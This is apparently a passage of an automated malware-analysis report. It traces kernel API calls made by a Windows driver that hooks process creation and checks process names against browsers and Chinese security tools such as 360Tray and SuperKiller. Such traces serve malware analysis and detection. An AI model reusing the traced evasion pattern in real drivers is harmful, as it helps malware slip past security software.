| RtlCopyUnicodeString | SourceString = svchost.exe, DestinationString_out = svchost.exe |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| ZwClose | Handle_unk = 0x4c, ret_val_out = 0x0 |
| _wcsicmp | _String1 = svchost.exe, _String2 = explorer.exe, ret_val_out = 14 |
| _wcsicmp | _String1 = svchost.exe, _String2 = 360Tray.exe, ret_val_out = 64 |
| _wcsicmp | _String1 = svchost.exe, _String2 = 360DesktopLite.exe, ret_val_out = 64 |
| _wcsicmp | _String1 = svchost.exe, _String2 = SoftMgrLite.exe, ret_val_out = 7 |
| _wcsicmp | _String1 = svchost.exe, _String2 = DCBrowserLauncher.exe, ret_val_out = 15 |
| _wcsicmp | _String1 = svchost.exe, _String2 = ChromeCoreLauncher.exe, ret_val_out = 16 |
| _wcsicmp | _String1 = svchost.exe, _String2 = WmiPrvSE.exe, ret_val_out = -4 |
| RtlFreeAnsiString | AnsiString = s |
| RtlFreeAnsiString | AnsiString = s |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6342f0, Tag = 0x776f6f |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763010, Tag = 0x776f6f |
| ObfReferenceObject | Object_ptr = 0xffffe0003ba59080, ret_val_ptr_out = 0x27ff7 |
| ZwOpenProcess | DesiredAccess_unk = 0x1fffff, ObjectAttributes_ptr = 0xffffd00032fe7c70, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName_ptr = 0x0, ObjectAttributes_deref_Attributes = 0x0, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ClientId_ptr = 0xffffd00032fe7c60, ClientId_deref_UniqueProcess_unk = 0xf50, ClientId_deref_UniqueThread_unk = 0x0, ProcessHandle_ptr_out = 0xffffd00032fe7cd0, ProcessHandle_out = 0x4c, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x4c, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd00032fe7cc0, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, Tag = 0x0, ret_val_ptr_out = 0xffffe0003c634270 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x4c, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x70, ProcessInformation_ptr_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00032fe7cc0, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = sc.exe, DestinationString_out = sc.exe |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe, Tag = 0x0, ret_val_ptr_out = 0xffffe0003c634250 |
| RtlCopyUnicodeString | SourceString = sc.exe, DestinationString_out = sc.exe |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 |
| ZwClose | Handle_unk = 0x4c, ret_val_out = 0x0 |
| _wcsicmp | _String1 = sc.exe, _String2 = msedge.exe, ret_val_out = 6 |
| _wcsicmp | _String1 = sc.exe, _String2 = iexplore.exe, ret_val_out = 10 |
| _wcsicmp | _String1 = sc.exe, _String2 = 360se.exe, ret_val_out = 64 |
| _wcsicmp | _String1 = sc.exe, _String2 = 2345Explorer.exe, ret_val_out = 65 |
| _wcsicmp | _String1 = sc.exe, _String2 = QQBrowser.exe, ret_val_out = 2 |
| _wcsicmp | _String1 = sc.exe, _String2 = chrome.exe, ret_val_out = 16 |
| _wcsicmp | _String1 = sc.exe, _String2 = 360chrome.exe, ret_val_out = 64 |
| _wcsicmp | _String1 = sc.exe, _String2 = SogouExplorer.exe, ret_val_out = -12 |
| _wcsicmp | _String1 = sc.exe, _String2 = Maxthon.exe, ret_val_out = 6 |
| _wcsicmp | _String1 = sc.exe, _String2 = TheWorld.exe, ret_val_out = -1 |
| _wcsicmp | _String1 = sc.exe, _String2 = firefox.exe, ret_val_out = 13 |
| _wcsicmp | _String1 = sc.exe, _String2 = DCBrowser.exe, ret_val_out = 15 |
| _wcsicmp | _String1 = sc.exe, _String2 = ChromeCore.exe, ret_val_out = 16 |
| _wcsicmp | _String1 = sc.exe, _String2 = liebao.exe, ret_val_out = 7 |
| RtlFreeAnsiString | AnsiString = s |
Execution Path #17 (length: 72, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 72 |
Processes
»
| Process | Count |
|---|---|
| Process 1 (pvdnlz.exe, PID: 2280) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x500, Tag = 0x776f6f, ret_val_ptr_out = 0xffffe0003a76e5f0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x500, Tag = 0x776f6f, ret_val_ptr_out = 0xffffe0003a76f010 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x8e8, Process_unk_out = 0xffffd00029ec4f08, ret_val_out = 0x0 |
| PsGetProcessInheritedFromUniqueProcessId | ret_val_out = 0x4a0 |
| ZwOpenProcess | DesiredAccess_unk = 0x1fffff, ObjectAttributes_ptr = 0xffffd00029ec4cc0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName_ptr = 0x0, ObjectAttributes_deref_Attributes = 0x200, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ClientId_ptr = 0xffffd00029ec4cb0, ClientId_deref_UniqueProcess_unk = 0x8e8, ClientId_deref_UniqueThread_unk = 0x0, ProcessHandle_ptr_out = 0xffffd00029ec4d08, ProcessHandle_out = 0xffffffff80000870, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000870, ProcessInformationClass_unk = 0x1a, ProcessInformationLength = 0x8, ProcessInformation_ptr_out = 0xffffd00029ec4d10, ReturnLength_ptr_out = 0xffffd00029ec4d00, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000870, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = PsGetProcessPeb, DestinationString_out = PsGetProcessPeb |
| MmGetSystemRoutineAddress | SystemRoutineName = PsGetProcessPeb, ret_val_ptr_out = 0xfffff8004175a98c |
| PsGetProcessPeb | ret_val_out = 0x3f4000 |
| ZwOpenProcess | DesiredAccess_unk = 0x1fffff, ObjectAttributes_ptr = 0xffffd00029ec4c50, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName_ptr = 0x0, ObjectAttributes_deref_Attributes = 0x0, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ClientId_ptr = 0xffffd00029ec4c40, ClientId_deref_UniqueProcess_unk = 0x8e8, ClientId_deref_UniqueThread_unk = 0x0, ProcessHandle_ptr_out = 0xffffd00029ec4cb0, ProcessHandle_out = 0x7c, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x7c, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd00029ec4ca0, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, Tag = 0x0, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x7c, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x78, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd00029ec4ca0, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = pvdNlZ.exe, DestinationString_out = pvdNlZ.exe |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x16, Tag = 0x0, ret_val_ptr_out = 0xffffe0003c634190 |
| RtlCopyUnicodeString | SourceString = pvdNlZ.exe, DestinationString_out = pvdNlZ.exe |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| ZwClose | Handle_unk = 0x7c, ret_val_out = 0x0 |
| ZwOpenProcess | DesiredAccess_unk = 0x1fffff, ObjectAttributes_ptr = 0xffffd00029ec4c50, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName_ptr = 0x0, ObjectAttributes_deref_Attributes = 0x0, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ClientId_ptr = 0xffffd00029ec4c40, ClientId_deref_UniqueProcess_unk = 0x4a0, ClientId_deref_UniqueThread_unk = 0x0, ProcessHandle_ptr_out = 0xffffd00029ec4cb0, ProcessHandle_out = 0x7c, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x7c, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd00029ec4ca0, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x6a, Tag = 0x0, ret_val_ptr_out = 0xffffe0003c634270 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x7c, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x6a, ProcessInformation_ptr_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029ec4ca0, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = explorer.exe, DestinationString_out = explorer.exe |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x1a, Tag = 0x0, ret_val_ptr_out = 0xffffe0003af95e90 |
| RtlCopyUnicodeString | SourceString = explorer.exe, DestinationString_out = explorer.exe |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 |
| ZwClose | Handle_unk = 0x7c, ret_val_out = 0x0 |
| _wcsicmp | _String1 = explorer.exe, _String2 = explorer.exe, ret_val_out = 0 |
| RtlFreeAnsiString | AnsiString = e |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = msedge.exe, ret_val_out = 3 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = iexplore.exe, ret_val_out = 7 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = 360se.exe, ret_val_out = 61 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = 2345Explorer.exe, ret_val_out = 62 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = QQBrowser.exe, ret_val_out = -1 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = chrome.exe, ret_val_out = 13 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = 360chrome.exe, ret_val_out = 61 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = SogouExplorer.exe, ret_val_out = -3 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = Maxthon.exe, ret_val_out = 3 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = TheWorld.exe, ret_val_out = -4 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = firefox.exe, ret_val_out = 10 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = DCBrowser.exe, ret_val_out = 12 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = ChromeCore.exe, ret_val_out = 13 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = liebao.exe, ret_val_out = 4 |
| RtlFreeAnsiString | AnsiString = p |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76e5f0, Tag = 0x776f6f |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76f010, Tag = 0x776f6f |
| ObfReferenceObject | Object_ptr = 0xffffe0003b09e080, ret_val_ptr_out = 0x18006 |
| ZwOpenProcess | DesiredAccess_unk = 0x1fffff, ObjectAttributes_ptr = 0xffffd00029ec4c70, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName_ptr = 0x0, ObjectAttributes_deref_Attributes = 0x0, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ClientId_ptr = 0xffffd00029ec4c60, ClientId_deref_UniqueProcess_unk = 0x8e8, ClientId_deref_UniqueThread_unk = 0x0, ProcessHandle_ptr_out = 0xffffd00029ec4cd0, ProcessHandle_out = 0x7c, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x7c, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd00029ec4cc0, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, Tag = 0x0, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x7c, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x78, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd00029ec4cc0, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = pvdNlZ.exe, DestinationString_out = pvdNlZ.exe |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x16, Tag = 0x0, ret_val_ptr_out = 0xffffe0003c634190 |
| RtlCopyUnicodeString | SourceString = pvdNlZ.exe, DestinationString_out = pvdNlZ.exe |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| ZwClose | Handle_unk = 0x7c, ret_val_out = 0x0 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = msedge.exe, ret_val_out = 3 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = iexplore.exe, ret_val_out = 7 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = 360se.exe, ret_val_out = 61 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = 2345Explorer.exe, ret_val_out = 62 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = QQBrowser.exe, ret_val_out = -1 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = chrome.exe, ret_val_out = 13 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = 360chrome.exe, ret_val_out = 61 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = SogouExplorer.exe, ret_val_out = -3 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = Maxthon.exe, ret_val_out = 3 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = TheWorld.exe, ret_val_out = -4 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = firefox.exe, ret_val_out = 10 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = DCBrowser.exe, ret_val_out = 12 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = ChromeCore.exe, ret_val_out = 13 |
| _wcsicmp | _String1 = pvdNlZ.exe, _String2 = liebao.exe, ret_val_out = 4 |
| RtlFreeAnsiString | AnsiString = p |
Execution Path #60 (length: 63, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 63 |
Processes
»
| Process | Count |
|---|---|
| Process 114 (mpcmdrun.exe, PID: 4164) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x500, Tag = 0x776f6f, ret_val_ptr_out = 0xffffe0003a7a4b00 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x500, Tag = 0x776f6f, ret_val_ptr_out = 0xffffe0003a7a45f0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x5ac, Process_unk_out = 0xffffd0002e87ce58, ret_val_out = 0x0 |
| ZwOpenProcess | DesiredAccess_unk = 0x1fffff, ObjectAttributes_ptr = 0xffffd0002e87cc10, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName_ptr = 0x0, ObjectAttributes_deref_Attributes = 0x200, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ClientId_ptr = 0xffffd0002e87cc00, ClientId_deref_UniqueProcess_unk = 0x5ac, ClientId_deref_UniqueThread_unk = 0x0, ProcessHandle_ptr_out = 0xffffd0002e87cc58, ProcessHandle_out = 0xffffffff80000d68, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000d68, ProcessInformationClass_unk = 0x1a, ProcessInformationLength = 0x8, ProcessInformation_ptr_out = 0xffffd0002e87cc60, ReturnLength_ptr_out = 0xffffd0002e87cc50, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000d68, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = PsGetProcessPeb, DestinationString_out = PsGetProcessPeb |
| MmGetSystemRoutineAddress | SystemRoutineName = PsGetProcessPeb, ret_val_ptr_out = 0xfffff8004175a98c |
| PsGetProcessPeb | ret_val_out = 0x319000 |
| ZwOpenProcess | DesiredAccess_unk = 0x1fffff, ObjectAttributes_ptr = 0xffffd0002e87cba0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName_ptr = 0x0, ObjectAttributes_deref_Attributes = 0x0, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ClientId_ptr = 0xffffd0002e87cb90, ClientId_deref_UniqueProcess_unk = 0x5ac, ClientId_deref_UniqueThread_unk = 0x0, ProcessHandle_ptr_out = 0xffffd0002e87cc00, ProcessHandle_out = 0x20, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x20, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002e87cbf0, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x0, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x20, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002e87cbf0, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = conhost.exe, DestinationString_out = conhost.exe |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x18, Tag = 0x0, ret_val_ptr_out = 0xffffe0003c634190 |
| RtlCopyUnicodeString | SourceString = conhost.exe, DestinationString_out = conhost.exe |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| ZwClose | Handle_unk = 0x20, ret_val_out = 0x0 |
| ZwOpenProcess | DesiredAccess_unk = 0x1fffff, ObjectAttributes_ptr = 0xffffd0002e87cba0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName_ptr = 0x0, ObjectAttributes_deref_Attributes = 0x0, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ClientId_ptr = 0xffffd0002e87cb90, ClientId_deref_UniqueProcess_unk = 0x1044, ClientId_deref_UniqueThread_unk = 0x0, ProcessHandle_ptr_out = 0xffffd0002e87cc00, ProcessHandle_out = 0x20, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x20, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002e87cbf0, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x98, Tag = 0x0, ret_val_ptr_out = 0xffffe0003af83ef0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x20, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x98, ProcessInformation_ptr_out = 0xffffe0003af83ef0, ReturnLength_ptr_out = 0xffffd0002e87cbf0, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = MpCmdRun.exe, DestinationString_out = MpCmdRun.exe |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x1a, Tag = 0x0, ret_val_ptr_out = 0xffffe0003af95e90 |
| RtlCopyUnicodeString | SourceString = MpCmdRun.exe, DestinationString_out = MpCmdRun.exe |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 |
| ZwClose | Handle_unk = 0x20, ret_val_out = 0x0 |
| _wcsicmp | _String1 = MpCmdRun.exe, _String2 = explorer.exe, ret_val_out = 8 |
| _wcsicmp | _String1 = MpCmdRun.exe, _String2 = 360Tray.exe, ret_val_out = 58 |
| _wcsicmp | _String1 = MpCmdRun.exe, _String2 = 360DesktopLite.exe, ret_val_out = 58 |
| _wcsicmp | _String1 = MpCmdRun.exe, _String2 = SoftMgrLite.exe, ret_val_out = -6 |
| _wcsicmp | _String1 = MpCmdRun.exe, _String2 = DCBrowserLauncher.exe, ret_val_out = 9 |
| _wcsicmp | _String1 = MpCmdRun.exe, _String2 = ChromeCoreLauncher.exe, ret_val_out = 10 |
| _wcsicmp | _String1 = MpCmdRun.exe, _String2 = WmiPrvSE.exe, ret_val_out = -10 |
| RtlFreeAnsiString | AnsiString = M |
| RtlFreeAnsiString | AnsiString = c |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7a4b00, Tag = 0x776f6f |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7a45f0, Tag = 0x776f6f |
| ObfReferenceObject | Object_ptr = 0xffffe0003b09a080, ret_val_ptr_out = 0x8001 |
| ZwOpenProcess | DesiredAccess_unk = 0x1fffff, ObjectAttributes_ptr = 0xffffd0002e87cbc0, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName_ptr = 0x0, ObjectAttributes_deref_Attributes = 0x0, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ClientId_ptr = 0xffffd0002e87cbb0, ClientId_deref_UniqueProcess_unk = 0x5ac, ClientId_deref_UniqueThread_unk = 0x0, ProcessHandle_ptr_out = 0xffffd0002e87cc20, ProcessHandle_out = 0x20, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x20, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002e87cc10, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x0, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0x20, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002e87cc10, ret_val_out = 0x0 |
| RtlInitUnicodeString | SourceString = conhost.exe, DestinationString_out = conhost.exe |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x18, Tag = 0x0, ret_val_ptr_out = 0xffffe0003c634190 |
| RtlCopyUnicodeString | SourceString = conhost.exe, DestinationString_out = conhost.exe |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| ZwClose | Handle_unk = 0x20, ret_val_out = 0x0 |
| _wcsicmp | _String1 = conhost.exe, _String2 = msedge.exe, ret_val_out = -10 |
| _wcsicmp | _String1 = conhost.exe, _String2 = iexplore.exe, ret_val_out = -6 |
| _wcsicmp | _String1 = conhost.exe, _String2 = 360se.exe, ret_val_out = 48 |
| _wcsicmp | _String1 = conhost.exe, _String2 = 2345Explorer.exe, ret_val_out = 49 |
| _wcsicmp | _String1 = conhost.exe, _String2 = QQBrowser.exe, ret_val_out = -14 |
| _wcsicmp | _String1 = conhost.exe, _String2 = chrome.exe, ret_val_out = 7 |
| _wcsicmp | _String1 = conhost.exe, _String2 = 360chrome.exe, ret_val_out = 48 |
| _wcsicmp | _String1 = conhost.exe, _String2 = SogouExplorer.exe, ret_val_out = -16 |
| _wcsicmp | _String1 = conhost.exe, _String2 = Maxthon.exe, ret_val_out = -10 |
| _wcsicmp | _String1 = conhost.exe, _String2 = TheWorld.exe, ret_val_out = -17 |
| _wcsicmp | _String1 = conhost.exe, _String2 = firefox.exe, ret_val_out = -3 |
| _wcsicmp | _String1 = conhost.exe, _String2 = DCBrowser.exe, ret_val_out = -1 |
| _wcsicmp | _String1 = conhost.exe, _String2 = ChromeCore.exe, ret_val_out = 7 |
| _wcsicmp | _String1 = conhost.exe, _String2 = liebao.exe, ret_val_out = -9 |
| RtlFreeAnsiString | AnsiString = c |
Code Block #17 (EP #15, #18)
»
| Information | Value |
|---|---|
| Trigger | PspCallProcessNotifyRoutines+0x198 |
| Start Address | 0xfffff800fc2caa40 |
Execution Path #15 (length: 5, count: 15, processes: 15)
»
| Information | Value |
|---|---|
| Sequence Length | 5 |
Processes
»
| Process | Count |
|---|---|
| Process 14 (svchost.exe, PID: 1296) | 1 |
| Process 20 (svchost.exe, PID: 3092) | 1 |
| Process 1 (pvdnlz.exe, PID: 2280) | 1 |
| Process 110 (dllhost.exe, PID: 2832) | 1 |
| Process 108 (UNKNOWN, PID: UNKNOWN) | 1 |
| Process 41 (backgroundtaskhost.exe, PID: 1124) | 1 |
| Process 44 (hxtsr.exe, PID: 3844) | 1 |
| Process 113 (backgroundtaskhost.exe, PID: 3936) | 1 |
| Process 112 (backgroundtaskhost.exe, PID: 3212) | 1 |
| Process 115 (cmd.exe, PID: 1224) | 1 |
| Process 114 (mpcmdrun.exe, PID: 4164) | 1 |
| Process 116 (UNKNOWN, PID: UNKNOWN) | 1 |
| Process 37 (taskhostw.exe, PID: 3804) | 1 |
| Process 111 (dllhost.exe, PID: 4116) | 1 |
| Process 18 (sppsvc.exe, PID: 3908) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| PsLookupProcessByProcessId | ProcessId_unk = 0x510, Process_unk_out = 0xffffd0002f2c7138, ret_val_out = 0x0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bebe4d0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc, ret_val_ptr_out = 0xffffe0003c634250 |
| RtlUpperString | DestinationString = svchost.exe, SourceString = svchost.exe, DestinationString_out = SVCHOST.EXE |
| RtlFreeAnsiString | AnsiString = SVCHOST.EXE |
Execution Path #18 (length: 89, count: 7, processes: 4)
»
| Information | Value |
|---|---|
| Sequence Length | 89 |
Processes
»
| Process | Count |
|---|---|
| Process 4 (svchost.exe, PID: 628) | 4 |
| Process 25 (winlogon.exe, PID: 508) | 1 |
| Process 7 (svchost.exe, PID: 888) | 1 |
| Process 114 (mpcmdrun.exe, PID: 4164) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| PsLookupProcessByProcessId | ProcessId_unk = 0x1014, Process_unk_out = 0xffffd0002a34e638, ret_val_out = 0x0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bfe04d0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc, ret_val_ptr_out = 0xffffe0003c634250 |
| RtlUpperString | DestinationString = dllhost.exe, SourceString = dllhost.exe, DestinationString_out = DLLHOST.EXE |
| strstr | _Str = DLLHOST.EXE, _SubStr = 360TRAY |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = SuperKiller, SourceString = SuperKiller, DestinationString_out = SUPERKILLER |
| strstr | _Str = DLLHOST.EXE, _SubStr = SUPERKILLER |
| RtlFreeAnsiString | AnsiString = SUPERKILLER |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = SuperKillller, SourceString = SuperKillller, DestinationString_out = SUPERKILLLLER |
| strstr | _Str = DLLHOST.EXE, _SubStr = SUPERKILLLLER |
| RtlFreeAnsiString | AnsiString = SUPERKILLLLER |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = 360EvtMgr, SourceString = 360EvtMgr, DestinationString_out = 360EVTMGR |
| strstr | _Str = DLLHOST.EXE, _SubStr = 360EVTMGR |
| RtlFreeAnsiString | AnsiString = 360EVTMGR |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = SystemAidBox, SourceString = SystemAidBox, DestinationString_out = SYSTEMAIDBOX |
| strstr | _Str = DLLHOST.EXE, _SubStr = SYSTEMAIDBOX |
